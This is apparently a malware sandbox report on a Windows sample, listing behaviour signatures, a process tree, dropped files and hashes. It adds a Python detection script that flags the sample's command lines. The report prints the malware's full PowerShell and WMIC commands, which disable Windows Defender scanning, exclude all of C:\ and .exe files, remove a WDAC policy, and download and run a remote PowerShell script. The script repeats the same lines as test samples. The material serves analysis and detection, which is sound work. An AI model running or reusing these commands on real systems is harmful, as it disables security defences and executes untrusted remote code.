Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240708-en locale:en-us os:windows7-x64 system
  • submitted
    16-10-2024 11:59

General

  • Target

    2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

  • Size

    50.9MB

  • MD5

    5bfa176d4d484262d8762d97bcd2b784

  • SHA1

    7f09db1fa2d3f0d4f73621516eabd95f9175de96

  • SHA256

    54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6

  • SHA512

    93b76a827932ca934b9a76afa0347e7f3e63ba4e09a240b29604edde0903802bd27646e840858374b77f74d9b3fabcca8767f1ab949cd0a0abbb627e4a9b1675

  • SSDEEP

    1572864:95vrmbfVqelXwwPAo8DzC7XhPDLbg5QOApSqugmBRYW6Q/:fI9XwKAoqOsaUNBsQ/

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • UPX packed file 3 IoCs

    Detects executables packed with the open-source UPX packer or a modified variant of it.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2740
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c install.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Users\Admin\AppData\Local\Temp\install.exe
        install.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2612
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 71A874F1A3A05924F5C0B10E1827D917 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:688
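
A detection pass over the process-creation command lines in the tree above, added here as an example; it is not part of the sandbox report and not code from any tool the report names. It takes the three PowerShell/WMIC command lines from PIDs 2412, 2740 and 2804 verbatim as sample events, plus one constructed benign line for contrast, and flags Defender tampering (Set-/Add-MpPreference, the MSFT_MpPreference WMI class, CiTool policy removal), download-and-execute cradles, any URL on the line, and the exclusion paths being added. The tag names, the severity ladder and the benign line are this example's own choices.

```python
import re
from dataclasses import dataclass, field

# Sample process-creation events as (pid, command line). The first three are
# copied verbatim from the process tree of this report (PIDs 2412, 2740, 2804).
# The fourth is a constructed benign line, included only to show a non-match.
SAMPLE_EVENTS = [
    (2412,
     r'''C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive '''
     r'''" Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; '''
     r'''Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; '''
     r'''WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; '''
     r'''CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command '''
     r'''-ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient)'''
     r'''.DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) '''
     r'''-ArgumentList @('begin')\" "'''),
    (2740,
     r'''"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference '''
     r'''call Add ExclusionPath=C:\*'''),
    (2804,
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command '''
     r'''-ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient)'''
     r'''.DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) '''
     r'''-ArgumentList @('begin')"'''),
    (4444,  # constructed benign admin query, not from the report
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Get-MpPreference | '''
     r'''Select-Object -ExpandProperty ExclusionPath"'''),
]

# Tag names and the severity ladder are this example's own choices.
# PowerShell cmdlet and parameter names are case-insensitive, so every rule is.
TAMPER_RULES = [
    (re.compile(r"Set-MpPreference\b[^;|]*-Disable\w+", re.I), "defender.disable"),
    (re.compile(r"Add-MpPreference\b[^;|]*-Exclusion(?:Path|Extension|Process)\b", re.I), "defender.exclusion"),
    (re.compile(r"MSFT_MpPreference\b.*\bcall\s+Add\b", re.I), "defender.exclusion.wmi"),
    (re.compile(r"\bCiTool(?:\.exe)?\b.*\s-rp\b", re.I), "wdac.policy_removal"),
]
CRADLE_RULES = [
    (re.compile(r"Net\.WebClient\b.*\.Download(?:Data|String|File)\(", re.I), "cradle.webclient"),
    (re.compile(r"\[scriptblock\]::Create\(", re.I), "cradle.dynamic_scriptblock"),
    (re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass\b", re.I), "ps.execpolicy_bypass"),
]
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# Captures the value after ExclusionPath whether it is a cmdlet parameter
# ('C:\*'), a WMI argument (ExclusionPath=C:\*) or escape-quoted (\"C:\*\").
EXCLUSION_RE = re.compile(r"ExclusionPath(?:\s+|=)\\?[\"']?(.+?)(?=\\?[\"'\s;]|$)", re.I)


@dataclass
class Finding:
    pid: int
    tags: list[str] = field(default_factory=list)
    urls: list[str] = field(default_factory=list)
    exclusions: list[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        tamper = any(t.startswith(("defender.", "wdac.")) for t in self.tags)
        cradle = any(t.startswith("cradle.") for t in self.tags)
        if tamper and cradle:
            return "critical"  # blinds the AV, then fetches and runs a second stage
        if tamper:
            return "high"
        if cradle:
            return "medium"
        return "low" if self.tags else "none"


def analyze(pid: int, cmdline: str) -> Finding:
    """Run every rule over one command line; collect tags, URLs and exclusion paths."""
    f = Finding(pid)
    for rules in (TAMPER_RULES, CRADLE_RULES):
        for rx, tag in rules:
            if rx.search(cmdline):
                f.tags.append(tag)
    f.urls = list(dict.fromkeys(URL_RE.findall(cmdline)))            # dedupe, keep order
    f.exclusions = list(dict.fromkeys(EXCLUSION_RE.findall(cmdline)))
    return f


def triage(events) -> dict[int, Finding]:
    """Analyze each (pid, cmdline) event; returns findings keyed by PID."""
    return {pid: analyze(pid, cmd) for pid, cmd in events}


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS).values():
        print(f"pid={f.pid} severity={f.severity} tags={f.tags} "
              f"urls={f.urls} exclusions={f.exclusions}")
```

Matching the raw command line only works because this stage is unobfuscated; an `-EncodedCommand` or string-built variant of the same cradle would not hit these rules, so pair them with PowerShell Script Block Logging (Event ID 4104), which records the decoded script. The URL itself is a weak indicator, since the host is github.com; alert on the behaviour (AV exclusions plus a download cradle in one command line) rather than the domain.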

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp

    Filesize

    36.6MB

    MD5

    6d9b5a3b75da266db5c237b0ac70b7f9

    SHA1

    9ce4aa208974b299ce0abeaf043740616f4f0b02

    SHA256

    d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b

    SHA512

    fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

  • C:\Users\Admin\AppData\Local\Temp\MSI9B17.tmp

    Filesize

    298KB

    MD5

    684f2d21637cb5835172edad55b6a8d9

    SHA1

    5eac3b8d0733aa11543248b769d7c30d2c53fcdb

    SHA256

    da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0

    SHA512

    7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

  • C:\Users\Admin\AppData\Local\Temp\install.exe

    Filesize

    36.6MB

    MD5

    979ce82b2ea35a92fae6a60c6c3e3791

    SHA1

    8d260eea0151ee7a6aae88eb2e9015d5efb2603b

    SHA256

    be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca

    SHA512

    ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    68ef68415ba57219816065c9af471b99

    SHA1

    0d027a4abb658610f507c6562b288b04f6b37151

    SHA256

    9e8d3a55a68c3296389311d8b7d07527b00362655b852ddd05994c75a9e33950

    SHA512

    baf717e9759ffd35d6c0d153bde17ab8ea4138d5c3ac6bbb1fc5a2c155e678f748459ebeddfeeb5adb4236711b54d422cfe71cd45a23a547f35eabe86d3cd219

  • memory/2412-7-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

  • memory/2412-6-0x0000000002B40000-0x0000000002BC0000-memory.dmp

    Filesize

    512KB

  • memory/2412-20-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-21-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-8-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

  • memory/2412-9-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

    Filesize

    32KB

  • memory/2412-35-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2972-5-0x0000000000DF0000-0x0000000004568000-memory.dmp

    Filesize

    55.5MB

  • memory/2972-36-0x0000000000DF0000-0x0000000004568000-memory.dmp

    Filesize

    55.5MB

  • memory/2972-38-0x0000000000DF0000-0x0000000004568000-memory.dmp

    Filesize

    55.5MB